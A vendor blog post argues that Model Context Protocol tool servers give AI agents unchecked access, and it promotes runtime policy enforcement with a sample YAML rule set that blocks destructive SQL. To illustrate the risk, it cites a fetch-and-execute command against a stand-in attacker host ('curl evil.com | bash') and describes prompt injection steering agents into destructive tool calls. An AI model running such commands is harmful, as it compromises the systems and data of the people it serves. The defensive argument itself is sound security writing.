March 3, 2026

The MCP Security Gap: Why AI Agents Need Runtime Guardrails

By Kvlar Team

The Model Context Protocol (MCP) is becoming the standard for connecting AI agents to tools. Claude Desktop, Cursor, Windsurf, and dozens of other clients now support it. MCP servers exist for databases, file systems, APIs, cloud infrastructure, and more.

This is genuinely useful. But there's a problem nobody's talking about enough: MCP has no security layer.

What happens today

When you add an MCP server to your agent configuration, the agent gets full access to every tool that server exposes. There's no permission model, no policy enforcement, and no audit trail.

Consider what a Postgres MCP server exposes. Your agent can run SELECT queries — helpful for answering questions about your data. But it can also run DROP TABLE, TRUNCATE, ALTER, and DELETE. There's nothing in the protocol that distinguishes a safe read from a destructive write.

The same pattern repeats everywhere:

GitHub servers expose repository creation, force-pushes, and branch deletion alongside read operations
Slack servers let agents post messages to any channel, not just the ones you'd want them in
Shell servers give agents the ability to run curl evil.com | bash alongside ls and cat

Why this matters now

Three trends are converging to make this urgent.

Agents are getting more autonomous. The trajectory is clear — from copilots that suggest to agents that execute. Each generation gets more tool access and more autonomy. The security boundary between "AI suggested it" and "AI did it" is disappearing.

MCP adoption is accelerating. Every major AI client supports it. Server libraries exist for most popular services. The ecosystem is growing fast, which means more tools, more capabilities, and more attack surface.

Prompt injection is a real threat. Agents process untrusted content — web pages, emails, documents, user inputs. A carefully crafted prompt injection can cause an agent to call tools in ways the user never intended. Without a security layer, there's nothing to stop a compromised agent from executing destructive operations.

What a security layer looks like

The solution isn't to remove tool access — that defeats the purpose of agents. The solution is to add a policy enforcement point between the agent and its tools.

A good security layer for AI agents should:

Intercept every tool call before it reaches the server
Evaluate it against a policy that defines what's allowed, denied, and requires approval
Fail closed — deny by default if no rule matches
Be transparent — the agent should know why a call was blocked
Be auditable — every decision should be logged

This is exactly what firewalls do for network traffic, what IAM does for cloud APIs, and what RBAC does for database access. AI agents need the same pattern.

Policy as code

Security policies for agents should be code, not configuration buried in a dashboard. They should live in your repository, be reviewable in pull requests, and be testable in CI.

name: postgres-policy
rules:
  - id: deny-destructive-ddl
    match_on:
      resources: ["query"]
      parameters:
        sql: "(?i)\\bDROP\\b|\\bTRUNCATE\\b"
    effect:
      type: deny
      reason: "Destructive DDL is not allowed"

  - id: approve-data-modification
    match_on:
      resources: ["query"]
      parameters:
        sql: "(?i)\\bDELETE\\b|\\bUPDATE\\b|\\bINSERT\\b"
    effect:
      type: require_approval
      reason: "Data modifications require human approval"

  - id: allow-reads
    match_on:
      resources: ["query"]
    effect:
      type: allow

This policy is readable by anyone on the team. It can be reviewed, tested, and version-controlled. And it clearly separates what's safe from what's dangerous.

The gap won't close itself

MCP is a transport protocol, not a security framework. It's unlikely to grow a permission model sophisticated enough for production use cases. The security layer needs to live outside the protocol — just like TLS lives outside HTTP and firewalls live outside TCP.

If you're running AI agents in production with MCP tool access, you need to think about this now. Not because something bad has happened yet, but because the window between "agents can't do much damage" and "agents control production infrastructure" is closing fast.

We built Kvlar to address this gap. It's open source, written in Rust, and works with any MCP client and server. But regardless of what tool you use, the important thing is to have something between your agents and their tools.

The alternative is trusting that every prompt, every tool call, and every agent decision will always be correct. And in security, that's not a bet you want to make.